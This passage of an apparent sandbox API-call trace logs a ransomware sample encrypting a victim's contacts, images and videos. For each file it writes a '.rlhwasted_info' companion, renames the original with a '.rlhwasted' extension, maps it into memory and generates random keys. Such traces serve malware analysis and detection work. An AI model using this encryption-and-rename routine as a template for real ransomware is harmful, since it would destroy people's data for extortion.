dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0186.656] WriteFile (in: hFile=0x128, lpBuffer=0x6ec7b8*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ec7b8*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0186.659] SetEndOfFile (hFile=0x128) returned 1 [0186.659] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0186.659] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0186.659] lstrcpyW (in: lpString1=0x6ef318, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0186.659] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact.rlhwasted")) returned 1 [0186.661] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0186.661] CreateFileMappingW (hFile=0x104, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0186.661] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x494 [0186.661] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x494) returned 0x6a0000 [0186.661] CloseHandle (hObject=0x104) returned 1 [0186.734] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x710fe8) returned 1 [0186.735] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0186.735] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0186.735] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x710fe8) returned 1 [0186.736] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0186.736] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0186.754] SetEndOfFile (hFile=0x128) returned 1 [0186.758] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0186.758] CloseHandle (hObject=0x128) returned 1 [0186.857] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef298 | out: hHeap=0x6b0000) returned 1 [0186.857] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8c28 | out: hHeap=0x6b0000) returned 1 [0186.857] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x710fe8) returned 1 [0186.858] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0186.858] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0186.858] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3SY9maueVCRh.swf") returned 58 [0186.858] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x27e) returned 0x6d4580 [0186.859] lstrcpyW (in: lpString1=0x6d45f4, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0186.859] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ec7b8 [0186.859] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x710fe8) returned 1 [0186.860] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x6ec7b8 | out: pbBuffer=0x6ec7b8) returned 1 [0186.861] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0186.861] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3SY9maueVCRh.swf.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3sy9mauevcrh.swf.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0186.862] WriteFile (in: hFile=0x128, lpBuffer=0x6ec7b8*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ec7b8*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0186.863] SetEndOfFile (hFile=0x128) returned 1 [0186.864] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0186.864] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0186.864] lstrcpyW (in: lpString1=0x6d45f4, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0186.864] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3SY9maueVCRh.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3sy9mauevcrh.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3SY9maueVCRh.swf.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3sy9mauevcrh.swf.rlhwasted")) returned 1 [0186.866] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3SY9maueVCRh.swf.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3sy9mauevcrh.swf.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0186.866] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0186.866] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x928a [0186.866] MapViewOfFile (hFileMappingObject=0x108, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x928a) returned 0x6a0000 [0186.866] CloseHandle (hObject=0x10c) returned 1 [0186.875] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x710fe8) returned 1 [0186.876] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x1b8, pbBuffer=0x6e8c48 | out: pbBuffer=0x6e8c48) returned 1 [0186.877] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0186.877] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x710fe8) returned 1 [0186.878] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0186.878] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0186.888] SetEndOfFile (hFile=0x128) returned 1 [0186.931] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0186.931] CloseHandle (hObject=0x128) returned 1 [0186.936] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0186.937] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef650 | out: hHeap=0x6b0000) returned 1 [0186.937] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x710fe8) returned 1 [0186.938] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0186.938] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0186.938] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6ul1PRbuC.jpg") returned 55 [0186.938] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x278) returned 0x6d4580 [0186.938] lstrcpyW (in: lpString1=0x6d45ee, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0186.938] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ec7b8 [0186.938] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x710fe8) returned 1 [0186.939] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x6ec7b8 | out: pbBuffer=0x6ec7b8) returned 1 [0186.939] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0186.940] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6ul1PRbuC.jpg.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6ul1prbuc.jpg.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0186.941] WriteFile (in: hFile=0x128, lpBuffer=0x6ec7b8*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ec7b8*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0186.942] SetEndOfFile (hFile=0x128) returned 1 [0186.943] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0186.943] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0186.943] lstrcpyW (in: lpString1=0x6d45ee, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0186.943] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6ul1PRbuC.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6ul1prbuc.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6ul1PRbuC.jpg.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6ul1prbuc.jpg.rlhwasted")) returned 1 [0186.945] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6ul1PRbuC.jpg.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6ul1prbuc.jpg.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0186.945] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0186.945] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x18632 [0186.945] MapViewOfFile (hFileMappingObject=0x108, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18632) returned 0xb00000 [0186.945] CloseHandle (hObject=0x10c) returned 1 [0186.952] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x710fe8) returned 1 [0186.953] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x1b8, pbBuffer=0x6ef560 | out: pbBuffer=0x6ef560) returned 1 [0186.953] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0186.953] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x710fe8) returned 1 [0186.954] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0186.954] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0186.965] SetEndOfFile (hFile=0x128) returned 1 [0187.009] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0187.009] CloseHandle (hObject=0x128) returned 1 [0187.011] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0187.011] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efdb8 | out: hHeap=0x6b0000) returned 1 [0187.011] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x710fe8) returned 1 [0187.012] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0187.012] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0187.012] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bERbBC4 3LX4Xr8.mkv") returned 62 [0187.012] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x286) returned 0x6d4580 [0187.012] lstrcpyW (in: lpString1=0x6d45fc, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0187.012] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ec7b8 [0187.012] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x710fe8) returned 1 [0187.013] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x6ec7b8 | out: pbBuffer=0x6ec7b8) returned 1 [0187.013] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0187.013] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bERbBC4 3LX4Xr8.mkv.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\berbbc4 3lx4xr8.mkv.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0187.015] WriteFile (in: hFile=0x128, lpBuffer=0x6ec7b8*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ec7b8*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0187.016] SetEndOfFile (hFile=0x128) returned 1 [0187.017] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.017] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0187.017] lstrcpyW (in: lpString1=0x6d45fc, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0187.017] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bERbBC4 3LX4Xr8.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\berbbc4 3lx4xr8.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bERbBC4 3LX4Xr8.mkv.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\berbbc4 3lx4xr8.mkv.rlhwasted")) returned 1 [0187.018] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bERbBC4 3LX4Xr8.mkv.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\berbbc4 3lx4xr8.mkv.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0187.019] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0187.019] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x17450 [0187.019] MapViewOfFile (hFileMappingObject=0x108, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17450) returned 0xb00000 [0187.019] CloseHandle (hObject=0x10c) returned 1 [0187.025] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x710fe8) returned 1 [0187.026] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0187.026] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0187.026] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x710fe8) returned 1 [0187.027] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0187.027] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0187.039] SetEndOfFile (hFile=0x128) returned 1 [0187.085] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0187.085] CloseHandle (hObject=0x128) returned 1 [0187.087] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0187.087] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef7f0 | out: hHeap=0x6b0000) returned 1 [0187.087] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x710fe8) returned 1 [0187.088] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0187.088] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0187.088] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jLYpDck9I.mkv") returned 55 [0187.088] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x278) returned 0x6d4580 [0187.088] lstrcpyW (in: lpString1=0x6d45ee, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0187.088] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ec7b8 [0187.088] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x710fe8) returned 1 [0187.089] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x6ec7b8 | out: pbBuffer=0x6ec7b8) returned 1 [0187.089] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0187.089] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jLYpDck9I.mkv.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jlypdck9i.mkv.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0187.090] WriteFile (in: hFile=0x128, lpBuffer=0x6ec7b8*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ec7b8*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0187.091] SetEndOfFile (hFile=0x128) returned 1 [0187.092] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.092] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0187.092] lstrcpyW (in: lpString1=0x6d45ee, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0187.092] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jLYpDck9I.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jlypdck9i.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jLYpDck9I.mkv.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jlypdck9i.mkv.rlhwasted")) returned 1 [0187.094] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jLYpDck9I.mkv.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jlypdck9i.mkv.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0187.094] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0187.094] GetFileSize (in: hFile=0x108, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x2588 [0187.094] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2588) returned 0x6a0000 [0187.094] CloseHandle (hObject=0x108) returned 1 [0187.096] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x710fe8) returned 1 [0187.097] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0187.097] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0187.097] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x710fe8) returned 1 [0187.098] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0187.098] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0187.108] SetEndOfFile (hFile=0x128) returned 1 [0187.111] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0187.111] CloseHandle (hObject=0x128) returned 1 [0187.113] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0187.113] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efe80 | out: hHeap=0x6b0000) returned 1 [0187.113] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x710fe8) returned 1 [0187.114] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0187.114] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0187.114] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kwiTjUo.mkv") returned 53 [0187.114] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x274) returned 0x6d4580 [0187.114] lstrcpyW (in: lpString1=0x6d45ea, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0187.114] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ec7b8 [0187.114] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x710fe8) returned 1 [0187.115] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x6ec7b8 | out: pbBuffer=0x6ec7b8) returned 1 [0187.115] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0187.115] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kwiTjUo.mkv.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kwitjuo.mkv.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0187.117] WriteFile (in: hFile=0x128, lpBuffer=0x6ec7b8*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ec7b8*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0187.118] SetEndOfFile (hFile=0x128) returned 1 [0187.163] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.163] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0187.163] lstrcpyW (in: lpString1=0x6d45ea, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0187.163] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kwiTjUo.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kwitjuo.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kwiTjUo.mkv.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kwitjuo.mkv.rlhwasted")) returned 1 [0187.172] CreateFileW 